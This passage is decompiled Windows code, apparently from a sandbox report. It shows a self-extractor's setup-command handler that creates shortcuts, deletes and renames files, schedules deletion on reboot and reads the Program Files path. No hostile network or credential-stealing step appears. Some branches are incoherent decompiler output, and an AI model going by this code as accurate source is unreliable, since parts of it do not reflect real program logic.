                                                                                                                                                              						} else {
                                                                                                                                                              							goto L127;
                                                                                                                                                              						}
                                                                                                                                                              						do {
                                                                                                                                                              							L127:
                                                                                                                                                              							__bl = __esi->i;
                                                                                                                                                              							__eflags = __bl - 0x20;
                                                                                                                                                              							if(__eflags == 0) {
                                                                                                                                                              								L129:
                                                                                                                                                              								__eax = __ebp - 0xc34;
                                                                                                                                                              								__esi->i = 0;
                                                                                                                                                              								__eax = E00405767(__eflags, __ebp - 0xc34, 0);
                                                                                                                                                              								__eflags = __al;
                                                                                                                                                              								if(__al == 0) {
                                                                                                                                                              									L135:
                                                                                                                                                              									__esi->i = __bl;
                                                                                                                                                              									goto L136;
                                                                                                                                                              								}
                                                                                                                                                              								L130:
                                                                                                                                                              								__edi = __esi;
                                                                                                                                                              								__eflags = __bl - 0x2f;
                                                                                                                                                              								if(__bl != 0x2f) {
                                                                                                                                                              									do {
                                                                                                                                                              										L132:
                                                                                                                                                              										__esi =  &(__esi->i);
                                                                                                                                                              										__eflags = __esi->i - 0x20;
                                                                                                                                                              									} while (__esi->i == 0x20);
                                                                                                                                                              									_push(__esi);
                                                                                                                                                              									__eax = __ebp - 0x834;
                                                                                                                                                              									L134:
                                                                                                                                                              									_push(__eax);
                                                                                                                                                              									__eax = E0040A477();
                                                                                                                                                              									 *__edi = __bl;
                                                                                                                                                              									goto L136;
                                                                                                                                                              								}
                                                                                                                                                              								L131:
                                                                                                                                                              								_t185 =  &(__esi->i); // 0x1
                                                                                                                                                              								__eax = _t185;
                                                                                                                                                              								_push(_t185);
                                                                                                                                                              								 *(__ebp - 0x834) = __bl;
                                                                                                                                                              								__eax = __ebp - 0x833;
                                                                                                                                                              								goto L134;
                                                                                                                                                              							}
                                                                                                                                                              							L128:
                                                                                                                                                              							__eflags = __bl - 0x2f;
                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                              								goto L136;
                                                                                                                                                              							}
                                                                                                                                                              							goto L129;
                                                                                                                                                              							L136:
                                                                                                                                                              							__esi =  &(__esi->i);
                                                                                                                                                              							__eflags = __esi->i;
                                                                                                                                                              						} while (__esi->i != 0);
                                                                                                                                                              						__eflags = __edi;
                                                                                                                                                              						if(__edi != 0) {
                                                                                                                                                              							 *__edi = 0;
                                                                                                                                                              						}
                                                                                                                                                              						goto L139;
                                                                                                                                                              					} else {
                                                                                                                                                              						L123:
                                                                                                                                                              						__ebp - 0xa4db = __ebp - 0xc34;
                                                                                                                                                              						E0040A477(__ebp - 0xc34, __ebp - 0xa4db) = __ebp - 0xc33;
                                                                                                                                                              						__eax = E004073AB(__ebp - 0xc33, 0x22);
                                                                                                                                                              						__eflags = __eax;
                                                                                                                                                              						if(__eax != 0) {
                                                                                                                                                              							 *__eax = 0;
                                                                                                                                                              							__ebp - 0x834 = E0040A477(__ebp - 0x834, __ebp - 0x834);
                                                                                                                                                              						}
                                                                                                                                                              						L139:
                                                                                                                                                              						__eflags =  *((char*)(__ebp - 0x64dc));
                                                                                                                                                              						if( *((char*)(__ebp - 0x64dc)) != 0) {
                                                                                                                                                              							__ebp - 0x2034 = __ebp - 0x64dc;
                                                                                                                                                              							__eax = E00405822(__ebp - 0x64dc, __ebp - 0x2034);
                                                                                                                                                              						}
                                                                                                                                                              						__ebp - 0x44dc = __ebp - 0xc34;
                                                                                                                                                              						E00405822(__ebp - 0xc34, __ebp - 0x44dc) = __ebp - 0x434;
                                                                                                                                                              						__eax = E0040AAC2(__ecx, __ebp - 0x434,  *(__ebp - 4)); // executed
                                                                                                                                                              						__ebp - 0x434 = E004076C8(__ebp - 0x434);
                                                                                                                                                              						__eflags =  *((char*)(__ebp - 0x94dc));
                                                                                                                                                              						if( *((char*)(__ebp - 0x94dc)) != 0) {
                                                                                                                                                              							__ebp - 0x94dc = __ebp - 0x434;
                                                                                                                                                              							E0040A5E2(__ebp - 0x434, __ebp - 0x94dc) = __ebp - 0x434;
                                                                                                                                                              							__eax = E004076C8(__ebp - 0x434);
                                                                                                                                                              						}
                                                                                                                                                              						__ebp - 0x434 = __ebp - 0x34d4;
                                                                                                                                                              						__eax = E0040A477(__ebp - 0x34d4, __ebp - 0x434);
                                                                                                                                                              						__eflags =  *(__ebp - 0x74dc);
                                                                                                                                                              						__eax = __ebp - 0x74dc;
                                                                                                                                                              						if( *(__ebp - 0x74dc) == 0) {
                                                                                                                                                              							__eax = __ebp - 0xa4dc;
                                                                                                                                                              						}
                                                                                                                                                              						__ebp - 0x434 = E0040A5E2(__ebp - 0x434, __ebp - 0x434);
                                                                                                                                                              						__eax = __ebp - 0x434;
                                                                                                                                                              						__eax = E00407690(__ebp - 0x434);
                                                                                                                                                              						__eflags = __eax;
                                                                                                                                                              						if(__eax == 0) {
                                                                                                                                                              							L147:
                                                                                                                                                              							__ebp - 0x434 = E0040A5E2(__ebp - 0x434, ".lnk");
                                                                                                                                                              							goto L148;
                                                                                                                                                              						} else {
                                                                                                                                                              							L146:
                                                                                                                                                              							__eax = E0040A59A(__eax, ".lnk");
                                                                                                                                                              							__eflags = __eax;
                                                                                                                                                              							if(__eax == 0) {
                                                                                                                                                              								L148:
                                                                                                                                                              								__ebp - 0x434 = E004058FF(__ebx, __esi, __ebp - 0x434, 0, 1); // executed
                                                                                                                                                              								 *(__ebp - 0x834) =  ~( *(__ebp - 0x834));
                                                                                                                                                              								asm("sbb eax, eax");
                                                                                                                                                              								__ecx = __ebp - 0x834;
                                                                                                                                                              								 ~( *(__ebp - 0x834)) & __ebp - 0x00000834 =  *(__ebp - 0x2034);
                                                                                                                                                              								__eax =  ~( *(__ebp - 0x2034));
                                                                                                                                                              								asm("sbb eax, eax");
                                                                                                                                                              								__ecx = __ebp - 0x2034;
                                                                                                                                                              								 ~( *(__ebp - 0x2034)) & __ebp - 0x00002034 =  *(__ebp - 0x84dc);
                                                                                                                                                              								__eax =  ~( *(__ebp - 0x84dc));
                                                                                                                                                              								asm("sbb eax, eax");
                                                                                                                                                              								__ecx = __ebp - 0x84dc;
                                                                                                                                                              								 ~( *(__ebp - 0x84dc)) & __ebp - 0x000084dc = __ebp - 0x434;
                                                                                                                                                              								__ebp - 0x44dc = E0040A9BD(__ebp - 0x44dc, __ebp - 0x434,  ~( *(__ebp - 0x84dc)) & __ebp - 0x000084dc,  ~( *(__ebp - 0x2034)) & __ebp - 0x00002034,  ~( *(__ebp - 0x834)) & __ebp - 0x00000834); // executed
                                                                                                                                                              								__eflags =  *(__ebp - 0x34d4);
                                                                                                                                                              								if( *(__ebp - 0x34d4) != 0) {
                                                                                                                                                              									__eax = __ebp - 0x34d4;
                                                                                                                                                              									SHChangeNotify(0x1000, 1, __ebp - 0x34d4, 0); // executed
                                                                                                                                                              								}
                                                                                                                                                              								while(1) {
                                                                                                                                                              									L152:
                                                                                                                                                              									_t231 = E0040B613(0x1000, _t307,  *((intOrPtr*)(_t309 + 0xc)), _t309 - 0x54dc, _t309 - 0x1c34, _t309 - 5, _t309 + 0xf);
                                                                                                                                                              									 *((intOrPtr*)(_t309 + 0xc)) = _t231;
                                                                                                                                                              									if(_t231 != 0) {
                                                                                                                                                              										_t307 = GetFileAttributesA;
                                                                                                                                                              										_t232 = _t309 - 0x1c34;
                                                                                                                                                              										 *(_t309 - 4) = _t309 - 0xb4dc;
                                                                                                                                                              										 *((intOrPtr*)(_t309 - 0xc)) = 6;
                                                                                                                                                              										goto L2;
                                                                                                                                                              									} else {
                                                                                                                                                              										break;
                                                                                                                                                              									}
                                                                                                                                                              									L4:
                                                                                                                                                              									while(lstrcmpiA(_t309 - 0x54dc,  *(0x4140b8 +  *(_t309 - 4) * 4)) != 0) {
                                                                                                                                                              										 *(_t309 - 4) =  *(_t309 - 4) + 1;
                                                                                                                                                              										if( *(_t309 - 4) < 0xd) {
                                                                                                                                                              											continue;
                                                                                                                                                              										} else {
                                                                                                                                                              											goto L152;
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              									__eflags =  *(_t309 - 4) - 0xc;
                                                                                                                                                              									if( *(_t309 - 4) > 0xc) {
                                                                                                                                                              										continue;
                                                                                                                                                              									}
                                                                                                                                                              									L8:
                                                                                                                                                              									switch( *((intOrPtr*)( *(_t309 - 4) * 4 +  &M0040CA61))) {
                                                                                                                                                              										case 0:
                                                                                                                                                              											L9:
                                                                                                                                                              											__eflags =  *((intOrPtr*)(_t309 + 0x10)) - 2;
                                                                                                                                                              											if( *((intOrPtr*)(_t309 + 0x10)) != 2) {
                                                                                                                                                              												goto L152;
                                                                                                                                                              											}
                                                                                                                                                              											L10:
                                                                                                                                                              											GetCurrentDirectoryA(0x400, _t309 - 0x434);
                                                                                                                                                              											E0040A477(_t309 - 0xc34, _t309 - 0x434);
                                                                                                                                                              											E004076C8(_t309 - 0xc34);
                                                                                                                                                              											E0040A5E2(_t309 - 0xc34, _t309 - 0x1c34);
                                                                                                                                                              											E00405BAD(_t309 - 0x40dc);
                                                                                                                                                              											E00405BDD(_t309 - 0x40dc, _t309 - 0xc34);
                                                                                                                                                              											E00403556(_t309 - 0x30d4);
                                                                                                                                                              											_push(0);
                                                                                                                                                              											_t301 = _t309 - 0x40dc;
                                                                                                                                                              											_t252 = E00405FAD(_t309 - 0x40dc, _t303, _t309 - 0x30d4);
                                                                                                                                                              											__eflags = _t252;
                                                                                                                                                              											if(_t252 == 0) {
                                                                                                                                                              												L27:
                                                                                                                                                              												E00405BCA(_t309 - 0x40dc);
                                                                                                                                                              												goto L152;
                                                                                                                                                              											} else {
                                                                                                                                                              												_t295 = "%s.%d.tmp";
                                                                                                                                                              												do {
                                                                                                                                                              													L12:
                                                                                                                                                              													SetFileAttributesA(_t309 - 0x30d4, 0);
                                                                                                                                                              													__eflags =  *((char*)(_t309 - 0x24c4));
                                                                                                                                                              													if( *((char*)(_t309 - 0x24c4)) == 0) {
                                                                                                                                                              														L18:
                                                                                                                                                              														_t257 = GetFileAttributesA(_t309 - 0x30d4);
                                                                                                                                                              														__eflags = _t257 - 0xffffffff;
                                                                                                                                                              														if(_t257 == 0xffffffff) {
                                                                                                                                                              															goto L26;
                                                                                                                                                              														}
                                                                                                                                                              														L19:
                                                                                                                                                              														_t261 = DeleteFileA(_t309 - 0x30d4);
                                                                                                                                                              														__eflags = _t261;
                                                                                                                                                              														if(_t261 != 0) {
                                                                                                                                                              															goto L26;
                                                                                                                                                              														} else {
                                                                                                                                                              															 *(_t309 - 4) =  *(_t309 - 4) & _t261;
                                                                                                                                                              															_push(_t261);
                                                                                                                                                              															goto L22;
                                                                                                                                                              															L22:
                                                                                                                                                              															wsprintfA(_t309 - 0x834, _t295, _t309 - 0x30d4);
                                                                                                                                                              															_t311 = _t311 + 0x10;
                                                                                                                                                              															_t266 = GetFileAttributesA(_t309 - 0x834);
                                                                                                                                                              															__eflags = _t266 - 0xffffffff;
                                                                                                                                                              															if(_t266 != 0xffffffff) {
                                                                                                                                                              																_t60 = _t309 - 4;
                                                                                                                                                              																 *_t60 =  *(_t309 - 4) + 1;
                                                                                                                                                              																__eflags =  *_t60;
                                                                                                                                                              																_push( *(_t309 - 4));
                                                                                                                                                              																goto L22;
                                                                                                                                                              															} else {
                                                                                                                                                              																_t269 = MoveFileA(_t309 - 0x30d4, _t309 - 0x834);
                                                                                                                                                              																__eflags = _t269;
                                                                                                                                                              																if(_t269 != 0) {
                                                                                                                                                              																	_t270 = E00406EA5();
                                                                                                                                                              																	__eflags = _t270;
                                                                                                                                                              																	if(_t270 != 0) {
                                                                                                                                                              																		MoveFileExA(_t309 - 0x834, 0, 4);
                                                                                                                                                              																	}
                                                                                                                                                              																}
                                                                                                                                                              																goto L26;
                                                                                                                                                              															}
                                                                                                                                                              														}
                                                                                                                                                              													}
                                                                                                                                                              													L13:
                                                                                                                                                              													__eflags = E00406EA5() - 4;
                                                                                                                                                              													if(__eflags == 0) {
                                                                                                                                                              														goto L18;
                                                                                                                                                              													}
                                                                                                                                                              													L14:
                                                                                                                                                              													E00407300(_t301, __eflags, _t309 - 0x434, _t309 - 0x2034);
                                                                                                                                                              													E004076C8(_t309 - 0x2034);
                                                                                                                                                              													_t280 = E0040A384(_t301, _t309 - 0x434);
                                                                                                                                                              													 *((intOrPtr*)(_t309 - 0xc)) = _t280;
                                                                                                                                                              													__eflags = _t280 - 4;
                                                                                                                                                              													if(_t280 < 4) {
                                                                                                                                                              														L16:
                                                                                                                                                              														_t282 = E00407279(_t301, _t309 - 0x1c34, 0);
                                                                                                                                                              														__eflags = _t282;
                                                                                                                                                              														if(_t282 != 0) {
                                                                                                                                                              															goto L27;
                                                                                                                                                              														}
                                                                                                                                                              														L17:
                                                                                                                                                              														 *((char*)(_t309 + E0040A384(_t301, _t309 - 0x30d4) - 0x30d3)) = 0;
                                                                                                                                                              														E0040A289(_t301, _t309 - 0x34, 0, 0x1e);
                                                                                                                                                              														_push(0x14);
                                                                                                                                                              														_pop(_t287);
                                                                                                                                                              														 *((short*)(_t309 - 0x24)) = _t287;
                                                                                                                                                              														 *((intOrPtr*)(_t309 - 0x2c)) = _t309 - 0x30d4;
                                                                                                                                                              														 *((intOrPtr*)(_t309 - 0x30)) = 3;
                                                                                                                                                              														SHFileOperationA(_t309 - 0x34);
                                                                                                                                                              														goto L18;
                                                                                                                                                              													}
                                                                                                                                                              													L15:
                                                                                                                                                              													_t292 = E0040A384(_t301, _t309 - 0x2034);
                                                                                                                                                              													__eflags =  *((intOrPtr*)(_t309 - 0xc)) - _t292;
                                                                                                                                                              													if( *((intOrPtr*)(_t309 - 0xc)) > _t292) {
                                                                                                                                                              														goto L17;
                                                                                                                                                              													}
                                                                                                                                                              													goto L16;
                                                                                                                                                              													L26:
                                                                                                                                                              													_push(0);
                                                                                                                                                              													_t301 = _t309 - 0x40dc;
                                                                                                                                                              													_t259 = E00405FAD(_t309 - 0x40dc, _t303, _t309 - 0x30d4);
                                                                                                                                                              													__eflags = _t259;
                                                                                                                                                              												} while (_t259 != 0);
                                                                                                                                                              												goto L27;
                                                                                                                                                              											}
                                                                                                                                                              										case 1:
                                                                                                                                                              											L28:
                                                                                                                                                              											__eflags =  *(__ebp + 0x10);
                                                                                                                                                              											if( *(__ebp + 0x10) == 0) {
                                                                                                                                                              												__eax =  *0x41a81c;
                                                                                                                                                              												__eflags =  *0x41a81c;
                                                                                                                                                              												__ebx = __ebx & 0xffffff00 |  *0x41a81c == 0x00000000;
                                                                                                                                                              												__eflags = __bl;
                                                                                                                                                              												if(__bl == 0) {
                                                                                                                                                              													__eax = E0040A5E2(__eax, "<br>");
                                                                                                                                                              												}
                                                                                                                                                              												L31:
                                                                                                                                                              												__eflags =  *((char*)(__ebp - 5));
                                                                                                                                                              												if(__eflags == 0) {
                                                                                                                                                              													__esi = __ebp + 0xc;
                                                                                                                                                              													__edi = E0040B7BA(__ebp + 0xc, __eflags);
                                                                                                                                                              												} else {
                                                                                                                                                              													__edi = __ebp - 0x1c34;
                                                                                                                                                              												}
                                                                                                                                                              												__eflags = __bl;
                                                                                                                                                              												if(__bl == 0) {
                                                                                                                                                              													__esi = E0040A384(__ecx,  *0x41a81c);
                                                                                                                                                              												} else {
                                                                                                                                                              													__esi = 0;
                                                                                                                                                              												}
                                                                                                                                                              												E0040A384(__ecx, __edi) = __eax + __esi + 5;
                                                                                                                                                              												__eax = E0040A224( *0x41a81c, __eax);
                                                                                                                                                              												 *0x41a81c = __eax;
                                                                                                                                                              												__eflags = __bl;
                                                                                                                                                              												if(__bl != 0) {
                                                                                                                                                              													 *__eax = 0;
                                                                                                                                                              												}
                                                                                                                                                              												L39:
                                                                                                                                                              												__eax = E0040A5E2(__eax, __edi);
                                                                                                                                                              												__eflags =  *((char*)(__ebp - 5));
                                                                                                                                                              												if( *((char*)(__ebp - 5)) == 0) {
                                                                                                                                                              													__eax = E0040A205(__edi);
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											goto L152;
                                                                                                                                                              										case 2:
                                                                                                                                                              											L41:
                                                                                                                                                              											__eflags =  *(__ebp + 0x10);
                                                                                                                                                              											if( *(__ebp + 0x10) == 0) {
                                                                                                                                                              												__ebp - 0x1c34 = SetWindowTextA( *(__ebp + 8), __ebp - 0x1c34); // executed
                                                                                                                                                              											}
                                                                                                                                                              											goto L152;
                                                                                                                                                              										case 3:
                                                                                                                                                              											L43:
                                                                                                                                                              											__eflags =  *(__ebp + 0x10);
                                                                                                                                                              											if( *(__ebp + 0x10) != 0) {
                                                                                                                                                              												goto L152;
                                                                                                                                                              											}
                                                                                                                                                              											L44:
                                                                                                                                                              											__eflags =  *0x419f92;
                                                                                                                                                              											if( *0x419f92 != 0) {
                                                                                                                                                              												goto L152;
                                                                                                                                                              											}
                                                                                                                                                              											L45:
                                                                                                                                                              											__eflags =  *(__ebp - 0x1c34) - 0x22;
                                                                                                                                                              											__esi = __ebp - 0x1c34;
                                                                                                                                                              											 *(__ebp - 0x434) = 0;
                                                                                                                                                              											if( *(__ebp - 0x1c34) == 0x22) {
                                                                                                                                                              												__esi = __ebp - 0x1c33;
                                                                                                                                                              											}
                                                                                                                                                              											__eax = E0040A384(__ecx, __esi);
                                                                                                                                                              											__eflags = __eax - 0x400;
                                                                                                                                                              											if(__eax >= 0x400) {
                                                                                                                                                              												goto L152;
                                                                                                                                                              											} else {
                                                                                                                                                              												L48:
                                                                                                                                                              												__al = __esi->i;
                                                                                                                                                              												__eflags = __al - 0x2e;
                                                                                                                                                              												if(__al != 0x2e) {
                                                                                                                                                              													L57:
                                                                                                                                                              													__eflags = __al - 0x5c;
                                                                                                                                                              													if(__al == 0x5c) {
                                                                                                                                                              														L51:
                                                                                                                                                              														__ebp - 0x434 = E0040A477(__ebp - 0x434, __esi);
                                                                                                                                                              														L52:
                                                                                                                                                              														__eax = __ebp - 0x434;
                                                                                                                                                              														__eax = E0040A3D9(__ecx, __ebp - 0x434, 0x22);
                                                                                                                                                              														__eflags = __eax;
                                                                                                                                                              														if(__eax != 0) {
                                                                                                                                                              															__eflags =  *((char*)(__eax + 1));
                                                                                                                                                              															if( *((char*)(__eax + 1)) == 0) {
                                                                                                                                                              																 *__eax = 0;
                                                                                                                                                              															}
                                                                                                                                                              														}
                                                                                                                                                              														__ebp - 0x434 = E0040A477(__ebx, __ebp - 0x434);
                                                                                                                                                              														__ebp - 0x434 = E0040B9B0(__esi, __ebp - 0x434); // executed
                                                                                                                                                              														__esi = GetDlgItem( *(__ebp + 8), 0x65);
                                                                                                                                                              														__ebp - 0x434 = SetWindowTextA(__esi, __ebp - 0x434); // executed
                                                                                                                                                              														__eax = SendMessageA(__esi, 0x143, 0, __ebx); // executed
                                                                                                                                                              														__eax = __ebp - 0x434;
                                                                                                                                                              														__eax = E0040A4E9(__ebx, __ebp - 0x434);
                                                                                                                                                              														__eflags = __eax;
                                                                                                                                                              														if(__eax != 0) {
                                                                                                                                                              															__ebp - 0x434 = SendMessageA(__esi, 0x143, 0, __ebp - 0x434);
                                                                                                                                                              														}
                                                                                                                                                              														goto L152;
                                                                                                                                                              													}
                                                                                                                                                              													L58:
                                                                                                                                                              													__eflags = __al;
                                                                                                                                                              													if(__al == 0) {
                                                                                                                                                              														L60:
                                                                                                                                                              														__eax = __ebp - 0x10;
                                                                                                                                                              														__eax = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1, __ebp - 0x10);
                                                                                                                                                              														__eflags = __eax;
                                                                                                                                                              														if(__eax == 0) {
                                                                                                                                                              															__ebp - 0xc = __ebp - 0x434;
                                                                                                                                                              															__eax = __ebp - 0x14;
                                                                                                                                                              															 *(__ebp - 0xc) = 0x400;
                                                                                                                                                              															RegQueryValueExA( *(__ebp - 0x10), "ProgramFilesDir", 0, __ebp - 0x14, __ebp - 0x434, __ebp - 0xc) = RegCloseKey( *(__ebp - 0x10));
                                                                                                                                                              														}
                                                                                                                                                              														__eflags =  *(__ebp - 0x434);
                                                                                                                                                              														if( *(__ebp - 0x434) != 0) {
                                                                                                                                                              															__eax = __ebp - 0x434;
                                                                                                                                                              															__eax = E0040A384(__ecx, __ebp - 0x434);
                                                                                                                                                              															__ecx = __ebp - 0x434;
                                                                                                                                                              															__ecx = __ebp - 0x433;
                                                                                                                                                              															__eflags =  *((char*)(__eax + __ecx)) - 0x5c;
                                                                                                                                                              															if( *((char*)(__eax + __ecx)) != 0x5c) {
                                                                                                                                                              																__ebp - 0x434 = E0040A5E2(__ebp - 0x434, "\\");
                                                                                                                                                              															}
                                                                                                                                                              														}
                                                                                                                                                              														__edi = E0040A384(__ecx, __esi);
                                                                                                                                                              														__eax = __ebp - 0x434;
                                                                                                                                                              														__edi = __edi + E0040A384(__ecx, __ebp - 0x434);
                                                                                                                                                              														__eflags = __edi - 0x3ff;
                                                                                                                                                              														if(__edi < 0x3ff) {
                                                                                                                                                              															__ebp - 0x434 = E0040A5E2(__ebp - 0x434, __esi);
                                                                                                                                                              														}
                                                                                                                                                              														goto L52;
                                                                                                                                                              													}
                                                                                                                                                              													L59:
                                                                                                                                                              													__eflags = __esi->i - 0x3a;
                                                                                                                                                              													if(__esi->i == 0x3a) {
                                                                                                                                                              														goto L51;
                                                                                                                                                              													}
                                                                                                                                                              													goto L60;
                                                                                                                                                              												}
                                                                                                                                                              												L49:
                                                                                                                                                              												__eflags = __esi->i - 0x5c;
                                                                                                                                                              												if(__esi->i != 0x5c) {
                                                                                                                                                              													goto L57;
                                                                                                                                                              												}
                                                                                                                                                              												L50:
                                                                                                                                                              												__esi =  &(__esi->i);
                                                                                                                                                              												__eflags = __esi;
                                                                                                                                                              												goto L51;
                                                                                                                                                              											}
                                                                                                                                                              										case 4:
                                                                                                                                                              											L67:
                                                                                                                                                              											__eflags =  *0x419f8c - 1;
                                                                                                                                                              											__eflags = __eax - 0x419f8c;
                                                                                                                                                              											 *__edi =  *__edi + __ecx;
                                                                                                                                                              											__eflags =  *(__ebp + 5) & __cl;
                                                                                                                                                              											 *__eax =  *__eax + __al;
                                                                                                                                                              											__eflags =  *__eax;
                                                                                                                                                              										case 5:
                                                                                                                                                              											L72:
                                                                                                                                                              											__eax =  *(__ebp - 0x1c34);
                                                                                                                                                              											__eax =  *(__ebp - 0x1c34);
                                                                                                                                                              											__eflags = __eax;
                                                                                                                                                              											if(__eax == 0) {
                                                                                                                                                              												L79:
                                                                                                                                                              												 *0x419edf = 0;
                                                                                                                                                              												 *0x419ede = 1;
                                                                                                                                                              												goto L152;
                                                                                                                                                              											}
                                                                                                                                                              											L73:
                                                                                                                                                              											__eax = __eax - 0x30;
                                                                                                                                                              											__eflags = __eax;
                                                                                                                                                              											if(__eax == 0) {
                                                                                                                                                              												L77:
                                                                                                                                                              												 *0x419edf = 0;
                                                                                                                                                              												L78:
                                                                                                                                                              												 *0x419ede = 0;
                                                                                                                                                              												goto L152;
                                                                                                                                                              											}
                                                                                                                                                              											L74:
                                                                                                                                                              											__eax = __eax - 1;
                                                                                                                                                              											__eflags = __eax;
                                                                                                                                                              											if(__eax == 0) {
                                                                                                                                                              												goto L79;
                                                                                                                                                              											}
                                                                                                                                                              											L75:
                                                                                                                                                              											__eax = __eax - 1;
                                                                                                                                                              											__eflags = __eax;
                                                                                                                                                              											if(__eax != 0) {
                                                                                                                                                              												goto L152;
                                                                                                                                                              											}
                                                                                                                                                              											L76:
                                                                                                                                                              											 *0x419edf = 1;
                                                                                                                                                              											goto L78;
                                                                                                                                                              										case 6:
                                                                                                                                                              											L85:
                                                                                                                                                              											__eflags =  *(__ebp + 0x10) - 4;
                                                                                                                                                              											if( *(__ebp + 0x10) != 4) {
                                                                                                                                                              												goto L152;
                                                                                                                                                              											}
                                                                                                                                                              											L86:
                                                                                                                                                              											_push(0);
                                                                                                                                                              											goto L87;
                                                                                                                                                              										case 7:
                                                                                                                                                              											L88:
                                                                                                                                                              											__eflags =  *(__ebp + 0x10) - 1;
                                                                                                                                                              											if( *(__ebp + 0x10) != 1) {
                                                                                                                                                              												L104:
                                                                                                                                                              												__eflags =  *(__ebp + 0x10) - 7;
                                                                                                                                                              												if( *(__ebp + 0x10) == 7) {
                                                                                                                                                              													__eflags =  *0x419f8c;
                                                                                                                                                              													if( *0x419f8c == 0) {
                                                                                                                                                              														 *0x419f8c = 2;
                                                                                                                                                              													}
                                                                                                                                                              													 *0x419f88 = 1;
                                                                                                                                                              												}
                                                                                                                                                              												goto L152;
                                                                                                                                                              											}
                                                                                                                                                              											L89:
                                                                                                                                                              											__ebp - 0xc34 = GetTempPathA(0x400, __ebp - 0xc34);
                                                                                                                                                              											__ebp - 0xc34 = E004076C8(__ebp - 0xc34);
                                                                                                                                                              											 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
                                                                                                                                                              											_push(0);
                                                                                                                                                              											__ebx = "%s%s%d";
                                                                                                                                                              											while(1) {
                                                                                                                                                              												L91:
                                                                                                                                                              												_push( *0x41409c);
                                                                                                                                                              												__eax = __ebp - 0xc34;
                                                                                                                                                              												_push(__ebp - 0xc34);
                                                                                                                                                              												__eax = __ebp - 0x834;
                                                                                                                                                              												_push(__ebx);
                                                                                                                                                              												_push(__ebp - 0x834);
                                                                                                                                                              												__eax =  *__edi();
                                                                                                                                                              												__esp = __esp + 0x14;
                                                                                                                                                              												__eax = __ebp - 0x834;
                                                                                                                                                              												_push(__ebp - 0x834);
                                                                                                                                                              												__eax = __esi->i();
                                                                                                                                                              												__eflags = __eax - 0xffffffff;
                                                                                                                                                              												if(__eax == 0xffffffff) {
                                                                                                                                                              													break;
                                                                                                                                                              												}
                                                                                                                                                              												L90:
                                                                                                                                                              												_t128 = __ebp - 4;
                                                                                                                                                              												 *_t128 =  *(__ebp - 4) + 1;
                                                                                                                                                              												__eflags =  *_t128;
                                                                                                                                                              												_push( *(__ebp - 4));
                                                                                                                                                              											}
                                                                                                                                                              											L92:
                                                                                                                                                              											__ebp - 0x834 = SetDlgItemTextA( *(__ebp + 8), 0x65, __ebp - 0x834);
                                                                                                                                                              											__eflags =  *(__ebp - 0x1c34);
                                                                                                                                                              											if( *(__ebp - 0x1c34) == 0) {
                                                                                                                                                              												goto L152;
                                                                                                                                                              											}
                                                                                                                                                              											L93:
                                                                                                                                                              											__eflags =  *0x41a816;
                                                                                                                                                              											if( *0x41a816 != 0) {
                                                                                                                                                              												goto L152;
                                                                                                                                                              											}
                                                                                                                                                              											L94:
                                                                                                                                                              											__eax = __ebp - 0x1c34;
                                                                                                                                                              											 *(__ebp - 0x234) = 0;
                                                                                                                                                              											__eax = E0040A3AD(__ebp - 0x1c34, 0x2c);
                                                                                                                                                              											__eflags = __eax;
                                                                                                                                                              											if(__eax != 0) {
                                                                                                                                                              												L100:
                                                                                                                                                              												__eflags =  *(__ebp - 0x234);
                                                                                                                                                              												if( *(__ebp - 0x234) == 0) {
                                                                                                                                                              													__ebp - 0xb4dc = __ebp - 0x1c34;
                                                                                                                                                              													E0040A477(__ebp - 0x1c34, __ebp - 0xb4dc) = __ebp - 0xa4dc;
                                                                                                                                                              													__ebp - 0x234 = E0040A477(__ebp - 0x234, __ebp - 0xa4dc);
                                                                                                                                                              												}
                                                                                                                                                              												__ebp - 0x1c34 = E0040ABA1(__ebp - 0x1c34);
                                                                                                                                                              												__ebp - 0x234 = __ebp - 0x1c34;
                                                                                                                                                              												 *((char*)(__ebp - 0x1434)) = 0;
                                                                                                                                                              												__eax = MessageBoxA( *(__ebp + 8), __ebp - 0x1c34, __ebp - 0x234, 0x24);
                                                                                                                                                              												__eflags = __eax - 6;
                                                                                                                                                              												if(__eax == 6) {
                                                                                                                                                              													goto L152;
                                                                                                                                                              												} else {
                                                                                                                                                              													L103:
                                                                                                                                                              													0 = 1;
                                                                                                                                                              													__eflags = 1;
                                                                                                                                                              													 *0x41a815 = 1;
                                                                                                                                                              													 *0x419f78 = 1;
                                                                                                                                                              													__eax = EndDialog( *(__ebp + 8), 1);
                                                                                                                                                              													goto L104;
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											L95:
                                                                                                                                                              											__esi = 0;
                                                                                                                                                              											__eflags =  *(__ebp - 0x1c34);
                                                                                                                                                              											if( *(__ebp - 0x1c34) == 0) {
                                                                                                                                                              												goto L100;
                                                                                                                                                              											} else {
                                                                                                                                                              												goto L96;
                                                                                                                                                              											}
                                                                                                                                                              											while(1) {
                                                                                                                                                              												L96:
                                                                                                                                                              												__eflags =  *((char*)(__ebp + __esi - 0x1c34)) - 0x40;
                                                                                                                                                              												if( *((char*)(__ebp + __esi - 0x1c34)) == 0x40) {
                                                                                                                                                              													break;
                                                                                                                                                              												}
                                                                                                                                                              												L97:
                                                                                                                                                              												__esi =  &(__esi->i);
                                                                                                                                                              												__eflags =  *((char*)(__ebp + __esi - 0x1c34));
                                                                                                                                                              												if( *((char*)(__ebp + __esi - 0x1c34)) != 0) {
                                                                                                                                                              													continue;
                                                                                                                                                              												}
                                                                                                                                                              												L98:
                                                                                                                                                              												goto L100;
                                                                                                                                                              											}
                                                                                                                                                              											L99:
                                                                                                                                                              											__ebp + __esi - 0x1c33 = __ebp - 0x234;
                                                                                                                                                              											__eax = E0040A477(__ebp - 0x234, __ebp + __esi - 0x1c33);
                                                                                                                                                              											 *((char*)(__ebp + __esi - 0x1c34)) = 0;
                                                                                                                                                              											goto L100;
                                                                                                                                                              										case 8:
                                                                                                                                                              											L108:
                                                                                                                                                              											__eflags =  *(__ebp + 0x10) - 3;
                                                                                                                                                              											if( *(__ebp + 0x10) == 3) {
                                                                                                                                                              												__eflags =  *(__ebp - 0x1c34);
                                                                                                                                                              												if(__eflags != 0) {
                                                                                                                                                              													__ebp - 0x1c34 = SetWindowTextA( *(__ebp + 8), __ebp - 0x1c34);
                                                                                                                                                              												}
                                                                                                                                                              												__esi = __ebp + 0xc;
